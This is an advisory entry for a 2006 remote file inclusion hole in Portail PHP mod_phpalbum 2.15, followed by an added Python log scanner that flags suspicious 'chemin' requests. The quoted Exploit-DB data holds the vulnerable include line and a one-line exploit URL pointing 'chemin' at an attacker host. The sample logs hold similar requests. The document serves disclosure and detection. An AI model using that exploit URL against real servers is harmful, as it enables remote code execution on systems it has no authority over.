Vendor: Portail PHP mod_phpalbum
By: XORON
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: Portail PHP mod_phpalbum
Affected Version From: 2.15
Affected Version To: 2.15
Patch Exists: YES
Related CWE: N/A
CPE: a:phpalbum:portail_php_mod_phpalbum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion Vulnerabilities

A remote file inclusion vulnerability exists in Portail PHP mod_phpalbum 2.15. An attacker can exploit this vulnerability to include arbitrary remote files by sending a specially crafted HTTP request containing directory traversal sequences and a malicious URL in the 'chemin' parameter to the 'sommaire_admin.php' script.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.
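
To check web server logs for requests of the kind described above, the following added example (not part of the original advisory or the vendor's code) scans access-log lines for requests to 'sommaire_admin.php' whose 'chemin' parameter carries a URL scheme or a traversal sequence. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme at the start of the value means include_once() would be handed a URL or wrapper.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)

def classify_chemin(value):
    """Return a reason string if the decoded 'chemin' value is suspicious, else None."""
    if SCHEME_RE.match(value) or value.startswith('//'):
        return 'remote-or-wrapper-url'
    if '..' in value.replace('\\', '/').split('/'):
        return 'directory-traversal'
    return None

def scan(lines):
    """Yield (line_number, reason, chemin_value) for suspicious requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith('/mod_phpalbum/sommaire_admin.php'):
            continue
        # parse_qs percent-decodes values, so encoded forms (http%3A%2F%2F, ..%2F) are caught too.
        for value in parse_qs(target.query, keep_blank_values=True).get('chemin', []):
            reason = classify_chemin(value)
            if reason:
                yield number, reason, value

# Constructed sample log lines (documentation addresses and example hosts only).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Aug/2006:10:00:01 +0000] "GET /portail/mod_phpalbum/sommaire_admin.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Aug/2006:10:02:13 +0000] "GET /portail/mod_phpalbum/sommaire_admin.php?chemin=http://files.example/x? HTTP/1.1" 200 312',
    '203.0.113.9 - - [29/Aug/2006:10:02:40 +0000] "GET /portail/mod_phpalbum/sommaire_admin.php?chemin=..%2F..%2Ftmp%2F HTTP/1.0" 200 87',
    '198.51.100.7 - - [29/Aug/2006:10:05:00 +0000] "GET /portail/index.php?chemin=http://files.example/x HTTP/1.1" 404 210',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that such a request was received; whether the include succeeded depends on the installed version and the server's PHP configuration.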

Exploit-DB raw data:

############################################################
#Portail PHP mod_phpalbum 2.15  Modules Remote File Inclusion Vulnerabilities
############################################################
#Author: XORON
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code:  include_once ($chemin."conf/code.php")
############################################################
#Exploit: http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA
############################################################
# milw0rm.com [2006-08-29]